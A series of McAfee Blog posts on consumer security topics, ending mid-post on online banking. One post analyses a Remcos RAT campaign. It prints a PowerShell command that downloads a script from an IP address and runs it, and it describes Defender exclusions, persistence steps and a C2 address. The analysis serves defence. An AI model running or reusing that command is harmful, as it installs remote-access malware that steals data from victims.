Take the story thenamesamber told on TikTok. It starts out like many. Amber wanted a job that allowed remote work, and luckily enough, a recruiter reached out to her through an online recruiting site with an opportunity. 

From there, the recruiter directed Amber to download a messaging app, which the company would use for the interview process. The interview went just fine, Amber got a job offer, and then the company asked Amber for a home address. 

Here’s where the catch comes in.  

Amber goes on to say that the company sent her a check by overnight mail, a check she should use to buy equipment. A check for nearly $5,000. For days, the check didn’t post. The company repeatedly asked for update. Had it posted yet? Had it posted yet?  

At this point, Amber said she got suspicious. She contacted her bank. The check had a hold placed on it, and according to Amber, she was charged a fee and her account frozen for days. In speaking with her bank, Amber was told that the check was bad and that she was the victim of a scam. The bank has seen a lot of it lately, said Amber. 

Yet based on what we’ve seen, Amber got lucky. 

What do online job scams look like? 

Victims and banks sometimes fail to spot the scam as it unfolds. In those cases, the check gets posted and the scammers tell the victim to forward the money to another person who’ll purchase equipment for them. Usually by way of an online payment app.  

Days later, the check bounces for insufficient funds. Meanwhile, victims get burdened with the fraud reporting process — with their bank and with the payment app they used. Depending on the means and terms of payment, some or all of that money might be gone for good. And as a result, the scammers get a few thousand dollars richer.   

If you spend some time on social media, you’ll stumble across plenty of videos that tell this exact story in one form or another. And with each story, you’ll find dozens of people sharing that the same thing happened, or almost happened, to them. 

We’re glad people are taking to TikTok to share their stories, even as sharing those stories can get painful. You can avoid these scams. Part of it involves awareness. They’re still going strong. The next part counts on you and your sharp eye to spot sketchy behavior when you see it.  

We’ll show you how, and that begins with a look at where these scams take place. 

Online job scams — what’s going on out there? 

Employment figures continue to surge. It’s a hot job market out there, and when things get hot, you’ll find scammers looking to turn a buck. It’s much like tax season and gift-giving holidays. Scammers will take advantage of trends and seasonal events where people go online and there’s money involved. Job scams are no different. 

Where do these scams crop up? 

As we reported earlier this year and as TikTok videos have shared, many appear to originate from trusted online recruiting platforms like LinkedIn and Indeed. Scammers will either set up a bogus company or pose as a representative of a legitimate company. In other cases, job scams take root on social media. Here, scammers play the same game—set up a bogus company or impersonate a legitimate one. 

From there, stories like Amber’s unfold. 

Without question, recruiting and social media platforms know what’s going on and take steps to quash scam accounts. 

For example, LinkedIn’s latest community report cited the removal of more than 21 million fake accounts in the first half of 2022:  

• Stopped at registration – 16.4 million accounts. 
• Restricted proactively before members reported – 5.4 million accounts. 
• Restricted after members reported – 190 thousand accounts.  

Likewise, Facebook took action on 426 million fake accounts in Q1 of 2023 alone, with nearly 99% of them acted on before users reported them.  

In its guidelines for a safe job search, Indeed mentions the global teams “dedicated to the safety and authenticity of the jobs posted on our platform.” 

Still, some scammers make their way through to these platforms and others like them. 

Online job scams — here’s what to look out for: 

Our earlier advice on the topic still holds true. You can spot scams several ways, particularly when you know that scammers want your money and personal information as quickly as possible. The moment any so-called job offer asks for any of those, a red flag should immediately go up.  

It’s possibly a scam if:  

They ask for your Social Security or tax ID number.  

In the hands of a scammer, your SSN or tax ID is the key to your identity. With it, they can open up bank cards, lines of credit, apply for insurance benefits, collect benefits and tax returns, or even commit crimes, all in your name. Needless to say, scammers will ask for it, perhaps under the guise of a background check or for payroll purposes. The only time you should provide your SSN or tax ID is when you know that you have accepted a legitimate job with a legitimate company. Only sent it through a secure document signing service, never via email, text, or over the phone.  

They want your banking information.  

Another trick scammers rely on is asking for bank account information so that they can wire a payment to you. As with the SSN above, closely guard this information and treat it in exactly the same way. Don’t give it out unless you have a legitimate job with a legitimate company.  

They want you to pay before you get paid.  

Some scammers will take a different route. They’ll promise employment, but first you’ll need to pay them for training, onboarding, or equipment before you can start work. Legitimate companies won’t make these kinds of requests. Amber’s check story provides a good example of this. 

They tell you to download a specific messaging app to communicate with them. 

Victims report that the scammers require a specific app to chat and, sometimes, to conduct the interview itself. Apps like Signal and Wire get mentioned, yet rest assured that these apps themselves are legitimate. The scammers are the problem, not the apps. Consider it a warning sign if someone asks you to largely communicate this way.  

Other signs of a job scam — more red flags to look for:  

Aside from the types of information they ask for, the way they ask for your information offers other clues that you might find yourself mixed up in a scam. Look out for the following as well:  

1) The offer is big on promises but short on details.  

You can sniff out many online scams with the “too good to be true” test. Scammers often make big promises during the holidays with low-priced offers for hard-to-get holiday gifts and then don’t deliver. It’s the same with job scams. The high pay, the low hours, and even the offer of things like a laptop and other perks, these are signs that a job offer might be a scam. Moreover, when pressed for details about this seemingly fantastic job opportunity, scammers might balk. Or they might come back with incomplete or inconsistent replies because the job doesn’t exist at all.  

2) They communicate only through email or chat.  

Job scammers hide behind their screens. They use the anonymity of the internet to their advantage. Job scammers likewise create phony profiles on networking and social media websites, which means they won’t agree to a video chat or call, which are commonly used in legitimate recruiting today. If your job offer doesn’t involve some sort of face-to-face communication, that indicates it might be a scam.  

3) And the communications seem a little …off.  

Scammers now have an additional tool to reel in their victims — AI chatbots like Chat GPT, which can generate email correspondence, chats, LinkedIn profiles, and other content in seconds so they can bilk victims on a huge scale. However, AI has its limits. Right now, it tends to use shorter sentences in a way that seems like it’s spitting out information. There’s little story or substance to the content it creates. That might be a sign of a scam. Likewise, even without AI, you might spot a recruiter using technical or job-related terms in unusual ways, as if they’re unfamiliar with the work they’re hiring for. That’s another potential sign.  

4) Things move too quickly.  

Scammers love quick conversion. Yet job seekers today know that interview processes are typically long and involved, often relying on several rounds of interviews and loops. If a job offer comes along without the usual rigor and the recruiter is asking for personal information practically right away, that’s another near-certain sign of a scam.  

5) You get job offers on Facebook or other social media sites not associated with job searches.  

This is another red flag. Legitimate businesses stick to platforms associated with networking for business purposes, typically not networking for families, friends, and interests. Why do scammers use sites like Facebook anyway? They’re a gold mine of information. By trolling public profiles, they have access to years of posts and armloads of personal information on thousands of people, which they can use to target their attacks. This is another good reason to set your social media profiles on platforms like Facebook, Instagram, and other friend-oriented sites to private so that scammers of all kinds, not just job scammers, can’t use your information against you.  

Further ways you can protect yourself from job scams.  

As a job hunter you know that getting the right job requires some research. You look up the company, dig into their history—the work they do, how long they’ve been at it, where their locations are, and maybe even read some reviews provided by current or former employees. When it comes to job offers that come out of the blue, it calls for taking that research a step further.   

After all, is that business really a business, or is it really a scam?  

In the U.S., you have several resources that can help you answer that question. The Better Business Bureau (BBB) offers a searchable listing of businesses in the U.S., along with a brief profile, a rating, and even a list of complaints (and company responses) waged against them. Spending some time here can quickly shed light on the legitimacy of a company.   

Also in the U.S., you can visit the website of your state’s Secretary of State and search for the business in question, where you can find when it was founded, if it’s still active, or if it exists at all. For businesses based in a state other than your own, you can visit that state’s Secretary of State website for information. For a state-by-state list of Secretaries of State, you can visit the Secretary of State Corporate Search page here.  

For a listing of businesses with international locations, organizations like S&P Global Ratings and the Dun and Bradstreet Corporation can provide background information, which might require signing up for an account.  

Lastly, protect yourself and your devices.   

Given the way we rely so heavily on the internet to get things done and enjoy our day, comprehensive online protection software that looks out for your identity, privacy, and devices is a must. Specific to job scams, it can help you in several ways, these being just a few:  

• Scammers still use links to malicious sites to trick people into providing their personal information. Web protection, included in our plans, can steer you clear of those links.   
• Moreover, scammers gather your contact information and other details so they can target you through data broker sites, fueled by thousands of data points on billions of people. McAfee’s Personal Data Cleanup scans some of the riskiest data broker sites, shows you which ones are selling your personal info, and, depending on your plan, can help you remove it.  
• Scammers might use any of your personal info that’s already out there on the dark web. McAfee’s Identity Monitoring scans the dark web for your personal info, including email, government IDs, credit card and bank account info, and more. It helps keep your personal info safe, with early alerts if your data is found on the dark web, an average of 10 months ahead of similar services.​

You have what it takes to avoid job search scams.  

Amber’s story, and stories like hers have racked up nearly a quarter-billion dollars in reported losses in the first half of this year here in the U.S. The median loss, somewhere around $2,000 per victim. 

Job scams persist. In fact, they’ve increased by nearly 25% this year compared to this time last year. It’s no surprise that scam stories on TikTok keep racking up. Yet as you’ve seen, awareness and a sharp eye can help you avoid them. 

Editor’s Note:  

Job scams are a crime. If you think that you or someone you know has fallen victim to one, report it to your authorities and appropriate government agencies. In the case of identity theft or loss of personal information, our knowledge base article on identity theft offers suggestions for the specific steps you can take in specific countries, along with helpful links for local authorities that you can turn to for reporting and assistance. 

The post Online Job Scams – TikTokers Tell Their Stories, with a Warning appeared first on McAfee Blog.

Authored by Preksha Saxena

McAfee labs observed a Remcos RAT campaign where malicious VBS files were delivered via phishing email. A phishing email contained a ZIP/RAR attachment. Inside this ZIP, was a heavily obfuscated VBS file. 

Remcos is a sophisticated RAT which provides an attacker with backdoor access to the infected system and collects a variety of sensitive information. Remcos incorporates different obfuscation and anti-debugging techniques to evade detection. It regularly updates its features and makes this malware a challenging adversary. 

Execution Flow: 

Figure 1: Execution Flow 

Stage 1: Analysis of VBS file 

VBS file is downloaded from a RAR file which is named as “August 2023 Statement of Account.z” This VBS file used various techniques to make analysis very difficult; including lots of commented code, and random strings that mask the true execution chain from being quickly visible. The actual data for execution is obfuscated too. 

Investigating this VBS script started with dealing with the large comment blocks as shown in figure below. 

Figure 2:VBS Script 

 One obfuscated string references a URL. The script contains a replace function to deobfuscate the proper command line. 

Another part of VBS script is the execute function shown in below image, which merely decodes a fake message. 

“omg!it’s_so_long_:-)you_found_the_secret_message_congrats!!” 

Figure 3:Deobfuscating PowerShell command using replace function. 

 The purpose of this VBS script is to download a payload using PowerShell. To increase the size, and make the script obfuscated, comments were added. The PowerShell command deobfuscates to: 

“powershell -w 1 -exeC Bypass -c “”[scriptblock]::Create ((Invoke-WebRequest ‘http://212.192.219.52/87656.txt’ -UseBasicParsing).Content).Invoke();””” 

Stage 2: Analysis of PowerShell script (87656.txt)  

The downloaded file, 87656.txt, is an obfuscated PowerShell script. 

Figure 4:Obfuscated PowerShell Script 

 The deobfuscation logic first searches for any variable containing “mdR”; in this case the result is ‘MaximumDriveCount’. From this string, characters at positions [3,11,2] are selected, resulting in the string “iex”. Here malware obfuscates iex(Invoke-Expression) command to evade itself from static detection. 

Figure 5:Resolving IEX 

Then, PowerShell script decodes the data using the Base64String algorithm and decompresses the decoded data using the Deflate Stream algorithm. 

Decompressed data is again a PowerShell script which is analyzed below. 

Stage 3: Analysis of decompressed PowerShell script  

The decompressed PowerShell script is large and obfuscated: 

Figure 6: Decompressed PowerShell script 

The first part of the script has the same logic present in the first PowerShell file. It is again decoding invoke-expression “ieX” by using the psHome variable. 

Figure 7:Deobfuscating PowerShell script 

The second part of the PowerShell script contains a base64 encoded PE file, which will be analyzed in a later stage. 

Figure 8: Base64 encoded data. 

The third part of PowerShell script is used to inject the decoded PE file in a newly created process. After deobfuscation, the code below is used for code injection. “Wintask.exe” is launched as a new process by the PowerShell script and the aforementioned PE file is injected in the Wintask.exe process. 

 Figure 9: Code used for PE injection. 

Windows Defender exclusions are added. 

Figure 10: Exclusion code 

Stage 4: Analysis of decoded PE File  

The 1.1MB PE file is a .NET binary, using an MSIL loader. 

Figure 11: MSIL Loader 

The Main function calls the Units function, which calls a random function. 

Figure 12:Main function 

The random function contains a large amount of encrypted data, stored in a text variable. 

Figure 13: Encrypted data 

The ‘text’ data is first converted from string to hex array then reversed and stored in variable ‘array’. The decryption key is hardcoded and stored in variable ‘array4’. The key is “0xD7” (215 in decimal). 

Figure 14: code for converting data to uppercase. 

The decryption loop issues the RC4 algorithm. The data decrypts a PE file, which is a DLL (Dynamic Link Library), loaded and executed using the ‘NewLateBinding.LateGet()’ method, passing the payload file (dGXsvRf.dll) as an argument as shown below. 

To execute the decrypted DLL in memory, the malware uses reflecting code loading. In this process, malware injects and executes the decrypted code in the same process. For this, the malware uses the load parameter in the ‘NewLateBinding.LateGet()’ function. 

Figure 15: RC4 algorithm 

Figure 16: New instance created for decrypted dll 

Stage 5: Analysis of dGXsvRf.dll 

Decrypted DLL ‘dGXsvRf.dll’ is the SykCrypter Trojan, using a resource named “SYKSBIKO” containing an encrypted payload. 

Figure 17: Encrypted payload 

SykCrypter decrypts the final payload and decrypts many strings related to identifying the presence of AV software, persistence, and anti-debugging techniques. The SykCrypter encrypted data is very large and is decrypted using a simple XOR operation with 170 as the key and current index.  

Figure 18: SykCryptor Encrypted data 

Each string is decrypted and accessed using a predefined function which hardcodes its length and offset in a large byte array. The final payload is stored in a resource and is decrypted using the RC4 algorithm with the key “uQExKBCIDisposablev”. 

Figure 19: RC4 Algorithm 

Another .NET dll with size 0x1200 and the method name, “Zlas1” is used for deflation. 

Figure 20: Loading DLL for deflation. 

The DLL then decrypts a list of various security solution process names: 

Figure 21:Code for decrypting Security processes Names 

The decrypted list of process names include: 

vsserv bdservicehost odscanui bdagent  

bullgaurd BgScan BullGuardBhvScanner etc. 

The malware also drops acopy of itself in the %appdata% folder using cmd. 

Figure 22: Copying file. 

Persistence: 

To persist system reboots, the malware creates a shortcut file in the Documents folder with a.pif extension, and creates a registry Run key entry. 

Figure 23: Persistence Mechanism 

Process Injection: 

The SykCrypter Dll decrypts and loads a .NET file and calls its “GetDelegateForFunctionPointer” function, creating delegation to all APIs from kernel32 and NTDll.dll in the same method. It loads GetThreadContext, SetThreadContext, ReadProcessMemory, VirtualAllocEx, NtUnmapViewOfSection and so on. 

Then, finally it loads “WriteProcessMemory,” API which injects the decrypted payload into a process and calls ResumeThread. 

Figure 24: Process Injection 

Stage 6: Analysis of final payload 

The final payload is a Microsoft Visual C++ 8 executable with size of 477 KB. Strings directly visible in file are: 

Figure 25: Strings in payload 

The configuration file of Remcos is present in RCData “SETTINGS“, which is encrypted with the RC4 algorithm. In the given sample, the key size is 76 byte long. 

Figure 26: RC4 encrypted configuration file 

Decrypted Configuration: 

 Figure 27: Decrypted configuration 

The Remcos configuration has C2 information (172.96.14.18), its port number (2404), mutex created by malware (Rmc-OB0RTV) and other configuration details. It has the capability to harvest information from various applications, such as browsers, email clients, cryptocurrency wallets etc. It also enables remote access for an attacker and can act as a dropper for other malware. 

Conclusion: 

RemcosRat is a complex multi-stage threat. McAfee Labs unpacked the how this malware downloads and executes VBS and PowerShell scripts; how the threat unwraps different layers and downloads the final Remcos remote access payload. At McAfee, we are committed to providing our customers with robust and effective threat defense that detects and protects against threats like RemcosRat and many other families. Our security software uses a combination of signature, machine learning, threat intelligence and behavioral-based detection techniques to identify and stop threats to keep you safe. 

Indicators of Compromise (IOCs):  

The post Peeling Back the Layers of RemcosRat Malware appeared first on McAfee Blog.

You can almost feel it in the air. Wi-Fi is everywhere. And if you tap into public Wi-Fi, do it with a VPN. 

The keyword in public Wi-Fi is “public.” That means anyone else on the network can see what you’re connecting to and what data you’re passing along, with a little effort. Your credit card number while you shop. Your password when you bank. That confidential contract you just sent to a client. And your logins for social media too. It’s all an open book to anyone who has the tools to snoop. 

What tools let them snoop? Network analyzers, or packet sniffers as many call them, can read the data traffic that travels across a network. And because public Wi-Fi networks are open, so is the data traffic — loaded with your credentials, personal info, and so on. A bad actor can gather up data with a packet sniffer, analyze it, and pluck out the sensitive bits of information that are of value. 

This is where a VPN comes in. It makes any network private. Even on public Wi-Fi. 

Let’s take a look at what a VPN is, how it works, and why it’s your friend on public Wi-Fi.    

What is a VPN and how does it protect me?   

A VPN is an app that you install on your device to help keep your data safe as you browse the internet. When you turn on your VPN app, your device makes a secure connection to a VPN server that routes internet traffic. Securely. This keeps your online activity private on any network, shielding it from prying eyes. Thus, while you’re on a VPN, you can browse and bank with the confidence that your passwords, credentials, and financial information are secure. If any malicious actors attempt to intercept your web traffic, they’ll only see garbled content, thanks to your VPN’s encryption functionality.    

Does a VPN change my IP address?   

Every internet connection is assigned a unique set of numbers called an IP address, which is tied to information such as geographic location or an Internet Service Provider (ISP). A VPN replaces your actual IP address to make it look like you’ve connected to the internet from the physical location of the VPN server, rather than your real location. This is just one reason so many people use VPNs.   

How can I use a VPN to change my IP address?  

To change your IP address, you open your VPN app, select the server location you’d like to connect to, and you’re done. You’re now browsing with a new IP address.  

When should I use a VPN?   

An ideal case for using a VPN is when you’re using public Wi-Fi at the airport, a café, hotel, or just about any place “free Wi-Fi” is offered. The reason being is that these are open networks, and any somewhat enterprising cybercriminal can tap into these networks and harvest sensitive information as a result. One survey showed that 39% of internet users worldwide understand public Wi-Fi is unsafe, yet some users still bank, shop, and do other sensitive things on public Wi-Fi despite the understood risks.  

Further, you have your privacy to consider. You can use a VPN to help stop advertisers from tracking you. Searches you perform and websites you visit won’t get traced back to you, which can prevent advertisers from gleaning information about you and your online habits in general. Moreover, some ISPs collect the browsing history of their users and share it with advertisers and other third parties. A VPN can prevent this type of collection as well.  

Can a VPN protect my search history?   

A VPN protects your search history through the secure connection you share. When you search for a website, or type a URL into your navigation bar, your device sends something called a DNS request, which translates the website into the IP address of the web server. This is how your browser can find the website and serve its content to you. By encrypting your DNS requests, a VPN can hide your search habits and history from those that might use that info as part of building a profile of you. Others might use this info in a wide variety of ways, from legitimately serving targeted ads to nefarious social engineering.    

Are VPNs and “Incognito Mode” and “Private Mode” in browsers the same thing?  

Note that a VPN is quite different and far, far more comprehensive than using “Private Mode” or “Incognito Mode” on your browser. Those modes only hide your search history locally on your device—not from others on the internet, like ISPs and advertisers.  

Does a VPN make me anonymous?   

No, a VPN can’t make you anonymous. Not entirely anyway. They help secure what you’re doing, but your ISP still knows when you’re using the internet. They just can’t see what you’re doing, what sites you visit, or how long you’ve been on a site.   

What about services like Apple Private Relay?   

Apple’s Private Relay is similar to a VPN in that it changes your IP address so websites you visit can’t tell exactly where you are. It works on iOS and Macs as part of an iCloud+ subscription. Yet there is one important distinction: it only protects your privacy while surfing with the Safari browser.  

Per Apple, it works like this:  

When Private Relay is enabled, your requests are sent through two separate, secure internet relays. Your IP address is visible to your network provider and to the first relay, which is operated by Apple. Your DNS records are encrypted, so neither party can see the address of the website you’re trying to visit. The second relay, which is operated by a third-party content provider, generates a temporary IP address, decrypts the name of the website you requested, and connects you to the site. All of this is done using the latest internet standards to maintain a high-performance browsing experience while protecting your privacy.  

Check to see if Apple Private Relay is available in your country or region. If you travel somewhere that Private Relay isn’t available, it’ll automatically turn off and will notify you when it’s unavailable and once more when it’s active again. You can learn more about it here , and how you can enable it on your Apple devices.  

Do I need a VPN if I have Apple Private Relay?   

Private Relay only works with Safari on iOS and macOS as part of an iCloud+ subscription. Even if you are using an Apple device, a VPN is still a good idea because it’ll protect the information that your device sends outside of Safari — such as any info passed along by your apps or any other browsers you might use.  

How to get your own VPN.  

An unlimited VPN with bank-grade encryption comes as part of your McAfee+ subscription and provides the security and privacy benefits above with bank-grade encryption. Additionally, it turns on automatically any time you connect to an unsecured Wi-Fi network, which takes the guesswork out of when you absolutely need to use it.   

In all, our VPN makes it practically impossible for cybercriminals or advertisers to access so that what you do online remains anonymous, so you can enjoy your time online with confidence.  

The post On Public Wi-Fi, a VPN is Your Friend appeared first on McAfee Blog.

Artificial intelligence used to be reserved for the population’s most brilliant scientists and isolated in the world’s top laboratories. Now, AI is available to anyone with an internet connection. Tools like ChatGPT, Voice.ai, DALL-E, and others have brought AI into daily life, but sometimes the terms used to describe their capabilities and inner workings are anything but mainstream. 

Here are 10 common terms you’ll likely to hear in the same sentence as your favorite AI tool, on the nightly news, or by the water cooler. Keep this AI dictionary handy to stay informed about this popular (and sometimes controversial) topic. 

AI-generated Content 

AI-generated content is any piece of written, audio, or visual media that was created partially or completely by an artificial intelligence-powered tool. 

If someone uses AI to create something, it doesn’t automatically mean they cheated or irresponsibly cut corners. AI is often a great place to start when creating outlines, compiling thought-starters, or seeking a new way of looking at a problem.  

AI Hallucination 

When your question stumps an AI, it doesn’t always admit that it doesn’t know the answer. So, instead of not giving an answer, it’ll make one up that it thinks you want to hear. This made-up answer is known as an AI hallucination. 

One real-world case of a costly AI hallucination occurred in New York where a lawyer used ChatGPT to write a brief. The brief seemed complete and cited its sources, but it turns out that none of the sources existed.1 It was all a figment of the AI’s “imagination.”  

Black Box 

To understand the term black box, imagine the AI as a system of cogs, pulleys, and conveyer belts housed within a box. In a see-through box, you can see how the input is transformed into the final product; however, some AI are referred to as a black box. That means you don’t know how the AI arrived at its conclusions. The AI completely hides its reasoning process. A black box can be a problem if you’d like to doublecheck the AI’s work. 

Deepfake 

Deepfake is the manipulation of a photo, video, or audio clip to portray events that never happened. Often used for humorous social media skits and viral posts, unsavory characters are also leveraging deepfake to spread fake news reports or scam people.  

For example, people are inserting politicians into unflattering poses and photo backgrounds. Sometimes the deepfake is intended to get a laugh, but other times the deepfake creator intends to spark rumors that could lead to dissent or tarnish the reputation of the photo subject. One tip to spot a deepfake image is to look at the hands and faces of people in the background. Deepfakes often add or subtract fingers or distort facial expressions. 

AI-assisted audio impersonations – which are considered deepfakes – are also rising in believability. According to McAfee’s “Beware the Artificial Imposter” report, 25% of respondents globally said that a voice scam happened either to themselves or to someone they know. Seventy-seven percent of people who were targeted by a voice scam lost money as a result.  

Deep Learning 

The closer an AI’s thinking process is to the human brain, the more accurate the AI is likely to be. Deep learning involves training an AI to reason and recall information like a human, meaning that the machine can identify patterns and make predictions. 

Explainable AI 

Explainable AI – or white box – is the opposite of black box AI. An explainable AI model always shows its work and how it arrived at its conclusion. Explainable AI can boost your confidence in the final output because you can doublecheck what went into the answer. 

Generative AI 

Generative AI is the type of artificial intelligence that powers many of today’s mainstream AI tools, like ChatGPT, Bard, and Craiyon. Like a sponge, generative AI soaks up huge amounts of data and recalls it to inform every answer it creates. 

Machine Learning 

Machine learning is integral to AI, because it lets the AI learn and continually improve. Without explicit instructions to do so, machine learning within AI allows the AI to get smarter the more it’s used. 

Responsible AI 

People must not only use AI responsibly, but the people designing and programming AI must do so responsibly, too. Technologists must ensure that the data the AI depends on is accurate and free from bias. This diligence is necessary to confirm that the AI’s output is correct and without prejudice.  

Sentient 

Sentient is an adjective that means someone or some thing is aware of feelings, sensations, and emotions. In futuristic movies depicting AI, the characters’ world goes off the rails when the robots become sentient, or when they “feel” human-like emotions. While it makes for great Hollywood drama, today’s AI is not sentient. It doesn’t empathize or understand the true meanings of happiness, excitement, sadness, or fear. 

So, even if an AI composed a short story that is so beautiful it made you cry, the AI doesn’t know that what it created was touching. It was just fulfilling a prompt and used a pattern to determine which word to choose next.  

1The New York Times, “Here’s What Happens When Your Lawyer Uses ChatGPT” 

The post 10 Artificial Intelligence Buzzwords You Should Know appeared first on McAfee Blog.

Have you ever lost your suitcase on vacation? You arrive at baggage claim, keeping your eyes peeled for your belongings. The carousel goes around and around dozens of times, but there’s no mistaking it: Your bag is gone. It could be anywhere!  

Now, you have to shop for new outfits and restock your toiletries. A logistical headache for sure.  

But have you ever lost your smartphone or your personally identifiable information (PII) on vacation? The stress and ramifications of either scenario puts the minor inconvenience of buying toothpaste into perspective. Not only is it an expensive piece of technology to replace, but the real cost comes from sensitive personal information stored on your phone that could land in a stranger’s hands.  

To travel-proof your PII and mobile devices, here are some key steps you should take before, during, and after your big international trip. 

Before Your Trip 

The surefire way to ensure your device isn’t stolen or lost while traveling internationally is to leave it at home. If that’s a viable option, do it! When traveling outside your home country, your phone plan might not even work abroad. Before you depart, think about how you might use your smartphone on vacation. To stay in contact with your traveling partners, consider outfitting your party with prepaid phones. These basic phones are usually inexpensive, and you can buy them at most airports and convenience stores when you arrive at your destination. 

If you do decide to bring your phone, here are a few quick device security measures you can put into place to protect your device and the sensitive information you have on it.  

• Enable passcode entry or face ID. If your device does fall into the wrong hands, passcode-protecting your device is a great way to immediately deny someone access, thus keeping your PII private.

• Clear your cache. Before you depart, clear your cache and browsing history on your phone. This way, you don’t have any of your usernames or passwords stored, and there are no hints on your device as to which bank you use or online shopping sites with which you have an account.  

• Invest in device security accessories. You’re not going to win any fashion awards, but phone tethers are one way to keep your device attached to your body, making it very difficult for someone to steal it. 

Also before you depart, do some research on the local dress, polite customs, and a few useful phrases in the local language. It’s best to try to blend in as much as possible while traveling. Revise your packing list to carry as little as possible. Wrangling a pile of luggage could distract you from paying attention to your surroundings. 

During Travel 

Seeing world-famous landmarks with your own eyes is one of the best parts of traveling, though tourist hot spots are infamous for various pickpocketing schemes. Even when you’re dazzled by the sights, remain aware of your surroundings.  

Another way to protect the information on your device is to be careful when logging into public wi-fi networks and scanning QR codes while you’re traveling. Cybercriminals can lurk on the free networks provided by hotels, cafes, airports, public libraries, etc. They wait for someone to log on and make a purchase or check their bank balance and swoop in to digitally eavesdrop on their sessions. 

Luckily, there’s an easy way to surf public wi-fi networks safely: virtual private networks (VPN). When you enable a VPN on your device, it encrypts all the information running into and out of your device, making it nearly impossible for someone to track your online comings and goings. McAfee+ includes a VPN among its many other services. 

QR codes are a convenient way for museums, restaurants, and other establishments to direct customers to a website for more information instead of dealing with paper pamphlets and menus. When you scan a QR code, double check that it’s official and ok to scan. Cybercriminals may post legitimate-looking QR codes that direct to suspicious sites or download malware to your device. 

After Travel 

Once you’re home from your adventure, it’s best practice to do some digital housekeeping. For example, delete your vacation-specific apps, like the train services you used to check schedules or book tickets. The fewer apps you have, the fewer chances a cybercriminal has of stealing your personal or payment information. 

Then, for the next few weeks, keep an eye on your credit card statements and any suspicious activity regarding your credit or identity. While you’re monitoring your accounts, might as well change your passwords while you’re in there. McAfee+ offers identity monitoring, credit reports, and identity theft coverage to give you extra peace of mind. 

Bon Voyage! 

Don’t let the unease of pickpockets or hidden malware stop you from enjoying your trip! Really, it only takes a few moderations to your daily routine to help you keep your devices and identity safer. 

The post A Traveler’s Guide to International Cybersecurity appeared first on McAfee Blog.

Authored by: Neil Tyagi  

Scam artists know no bounds—and that also applies to stealing your cryptocurrency. Crypto scams are like any other financial scam, except the scammers are after your crypto assets rather than your cash. 

Crypto scammers use many tactics in other financial crimes, such as pump-and-dump scams that lure investors to purchase an asset with fake claims about its value or outright attempts to steal digital assets. 

This time scammers were trying to get an investor to send a digital asset as a form of payment for a fraudulent transaction. 

It starts with a Tweet used as bait to lure innocent cryptocurrency investors into purchasing a non-existent token, related to a reputed company, SpaceX. 

The theme used here by scammers is the sale of the official cryptocurrency of SpaceX. In the above image we can also see the reach of the tweet is high. (224.4K views) 

 Protection with McAfee+:  

McAfee+ provides all-in-one online protection for your identity, privacy, and security. With McAfee+, you’ll feel safer online because you’ll have the tools, guidance, and support to take the steps to be safer online. McAfee protects against these types of scam sites with Web Advisor protection that detects malicious websites. 

The link present in this tweet redirects to  space[-]launch[.]net, which is already marked as malicious by McAfee. 

A WHOIS search on the site reveals it is hosted on Cloudflare. Cloudflare has increasingly become the number one choice for scammers to host malicious websites and protect their assets. 

A WHOIS lookup on the domain reveals redacted personal information. No surprises there  

When we click on the link, it takes us to a login page and asks for SpaceX login credentials. This page was designed as a phishing page for people who have real SpaceX login credentials. 

For people who don’t have SpaceX credentials, they can use the signup link.  

After we log in, it redirects to a landing page where one can purchase the supposedly original cryptocurrency launched by SpaceX

As you can see, it impersonates as the official SpaceX portal for buying their token. It also has all the elements related to SpaceX and its branding. 

In the above picture, we can see that scammers are employing the social engineering trick of FOMO (Fear Of Missing Out) as they have created a timer showing that the fake tokens are only available for purchase for the next 10 hours. This also makes sure that the scam would end before all the online security vendors flag the site. 

Scammers also allow users to purchase fake tokens from about 22 cryptocurrencies, the prominent being Bitcoin, Ethereum, and USDT. 

Scammers even offer a bonus of fake SpaceX tokens if users are ready to purchase a minimum amount

Here we can find the BTC wallet address of the scammers and see the transactions related to these wallets. 

The crypto wallet addresses of scammers for the following currencies are.  

• BTC bc1qhhec8pkhj2cxtk6u0dace8terq22hspxkr5pee 
• USDT 398a9BF5fe5fc6CaBB4a8Be8B428138BC7356EC1 
• ETH 16a243E3392Ffd9A872F3fD90dE79Fe7266452F9 

Looking at transactions related to these addresses, we find people have become victims of this scam by sending payments to these wallets. The Bitcoin wallet above has gathered around 2,780 US dollars. You can also see three of the last transactions made to the account. 

Similarly, for Ethereum, the scammers have gathered around 1,450 US dollars 

We observed two popular cryptocurrencies, but scammers are using about 22 different crypto wallets.  

Crypto phishing scams constantly evolve, and new tactics emerge regularly. Users should take the initiative to educate themselves about the latest phishing techniques and scams targeting the cryptocurrency community. Also, stay informed by researching and reading about recent phishing incidents and security best practices. 

IOC (Indicator of Compromise)  

The post Crypto Scam: SpaceX Tokens for Sale appeared first on McAfee Blog.

Whether or not you’re much into online banking, protecting yourself from bank fraud is a must. 

Online banking is well on its way to becoming a cornerstone of the banking experience overall. More and more transactions occur over the internet rather than at a teller’s window, and nearly every account has a username, password, and PIN linked with it. And whether you use your online banking credentials often or not, hackers and scammers still want to get their hands on them. 

The fact is, online banking is growing and is here to stay. No longer a novelty, online banking is an expectation. Today, 78% of adults in the U.S. prefer to bank online. Meanwhile, only 29% prefer to bank in person. Further projections estimate that more than 3.5 billion people worldwide will bank online, driven in large part by online-only banks. 

There’s no doubt about it. We live in a world where banking, shopping, and payments revolve around a username and password. That’s quite a bit to take in, particularly if your first experiences with banking involved walking into a branch, getting a paper passbook, and maybe even a free toaster for opening an account. 

So, how do you protect yourself? Whether you use online banking regularly or sparingly, you can protect yourself from being the victim of fraud by following a few straightforward steps. 

Here’s how you can protect yourself from online banking fraud 

Use a strong password—and a password manager to keep them straight 

Start here. Passwords are your first line of defense. However, one thing that can be a headache is the number of passwords we have to juggle—a number that seems like it’s growing every day. Look around online and you’ll see multiple studies and articles stating that the average person has upwards of 80 to manage. Even if you have only a small percentage of those, strongly consider using a password manager. A good choice will generate strong, unique passwords for each of your accounts and store them securely for you. 

In general, avoid simple passwords that people can guess or easily glean from other sources (like your birthday, your child’s birthday, the name of your pet, and so on). Additionally, make them unique from account to account. That’s can save you major headaches if one account gets compromised and a hacker tries to use the same password on another account.  

If you want to set up your own passwords, check out this article on how you can make them strong and unique. 

Use two-factor authentication to protect your accounts 

What exactly is two-factor authentication? It’s an extra layer of defense for your accounts. In practice, it means that in addition to providing a password, you also receive a special one-time-use code to access your account. That code might be sent to you via email or to your phone by text. In some cases, you can also receive that code by a call to your phone. Basically, two-factor authentication combines two things: something you know, like your password; and something you have, like your smartphone. Together, that makes it tougher for scammers to hack into your accounts. 

